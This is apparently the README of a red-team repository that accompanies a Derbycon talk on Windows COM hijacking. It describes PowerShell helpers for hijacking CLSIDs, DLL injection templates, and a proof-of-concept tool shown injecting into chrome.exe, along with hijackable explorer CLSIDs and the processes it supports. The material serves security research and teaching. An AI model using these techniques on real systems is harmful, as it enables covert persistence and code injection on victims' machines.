acCOMplice
Your COM hijacking accomplice
Author: David Tulis (@kafkaesqu3)
Overview
This repository contains code samples and proofs-of-concept for exploring COM hijacking. COM hijacking is a Windows post exploitation technique, which can be used for persistence or defense evasion.
For more information on the COM interface, how to find hijacks, and techniques for abusing a hijack, please refer to the presentation given at Derbycon 9, COM Hijacking Techniques.
- Slides: https://www.slideshare.net/DavidTulis1/com-hijacking-techniques-derbycon-2019
- Presentation: https://www.youtube.com/watch?v=pH14BvUiTLY
Project
- COMHijackToolkit: Powershell script containing helper scripts for dealing
with COM hijacks. Quick highlights:
Extract-HijackableKeysFromProcmonCSV
: parses a Procmon CSV export for hijackable objectsHijack-CLSID
: Hijacks a CLSID with a given DLLHijack-MultipleKeys
: Hijacks multiple CLSDs concurrently with a given DLL. This is useful for finding CLSIDs which are activated often
- InjectionTemplates: 3 templates demoed at Derbycon presentation
- Create a new process with
CreateProcess
- Inject into an existing process with
CreateRemoteThread
- Measure thread lifetimes in current process using
CreateThread
- Create a new process with
- COMinject: Proof of concept demonstrating how COM hijacks can be used to accomplish process injections/migrations
- masterkeys.csv: Some keys for you to play with
- procmon-filters: Filters for Procmon to aid in hijack identification and exploitation
Examples
COMHijackToolkit
Powershell script containing helper scripts for dealing with COM hijacks. Highlights:
Show all COM object CLSIDs and the location of the implementation on disk
$keys = Get-CLSIDRegistryKeys -RegHive HKCR
$results = $keys | % {$guid = Extract-GUIDFromText $_; Map-GUIDToDLL -guid $guid 2> $null }
Conduct a survey of CLSIDs on a system
$HKCR_keys = Get-CLSIDRegistryKeys -RegHive HKCR
$HKCR_keys | where-object {$_ -like "*inprocserver"} | Measure-Object
$HKCR_keys | where-object {$_ -like "*inprocserver32"} | Measure-Object
$HKCR_keys | where-object {$_ -like "*localserver"} | Measure-Object
$HKCR_keys | where-object {$_ -like "*localserver32"} | Measure-Object
$HKLM_keys = Get-CLSIDRegistryKeys -RegHive HKLM
$HKLM_keys | Measure-Object
$HKCU_keys = Get-CLSIDRegistryKeys -RegHive HKCU
$HKCU_keys | Measure-Object
explorer:{69486DD6-C19F-42e8-B508-A53F9F8E67B8}
explorer:{9E175B6D-F52A-11D8-B9A5-505054503030}
explorer:{30CC9D06-7E62-4966-9777-BC3442E788BD}
explorer:{3eef301f-b596-4c0b-bd92-013beafce793}
explorer:{682159d9-c321-47ca-b3f1-30e36b2ec8b9}
explorer:{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
explorer:{9aa46009-3ce0-458a-a354-715610a075e6}
explorer:{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
explorer:{AC36A05C-FB95-4C7A-868C-A43CC8D2D926}
explorer:{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}
explorer:{c2f03a33-21f5-47fa-b4bb-156362a2f239}
Find CLSIDs referencing a DLL which does not exist on the system:
Find-MissingLibraries
InjectionTemplates
3 proof-of-concept templates for COM hijack abuse, as demonstrated in the Derbycon 9 presentation:
HijackDLL-Process
: Create a new process when DLL is loadedHijackDLL-CreateRemoteThread
: Perform thread injection technique usingCreateRemoteThread
API call when DLL is loadedHijackDLL-Threads
: Useful for measuring lifetime of a threads started in the DLL after a hijack
COMinject
Proof of concept to show how COM hijacking can be used for process injections:
- COMInjectDotNet: Proof of concept client which will inject a DLL into a supported process via COM hijack
- COMInjectTarget: The target library to inject into a process
The first step is to perform the hijack:
COMInjectDotNet.exe chrome.exe C:\COM\COMInjectTarget.dll
The hijack won't trigger immediately, and may require the application to be started (if not currently running), or some basic application actions. There are probably some better CLSIDs that trigger more often, but these are good enough.
The COMInjectTarget.dll
will log its progress to a log file in C:\COM
. This
appears more stable than using something like AllocConsole
from within another
process and just printing to the console.
The following shows the injected DLL running from within the main chrome.exe
process:
[*] chrome pid=9104 ppid=4900 (count 0)
[*] chrome pid=9104 ppid=4900 (count 1)
[*] chrome pid=9104 ppid=4900 (count 2)
[*] chrome pid=9104 ppid=4900 (count 3)
[*] chrome pid=9104 ppid=4900 (count 4)
[*] chrome pid=9104 ppid=4900 (count 5)
The currently supported processes are:
- explorer (default)
- chrome
- excel
- word
- outlook
References and credits
To learn more about COM and COM hijacks:
- Leo Loobeek (@leoloobeek):
- COMProxy, which I borrowed code heavily from
- Proxying COM For Stable Hijacks
- Matt Nelson (@enigma0x3):
- The @bohops series on COM hijacks:
- James Forshaw (@tiraniddo):
- Casey Smith (@subtee) + @enimga0x3: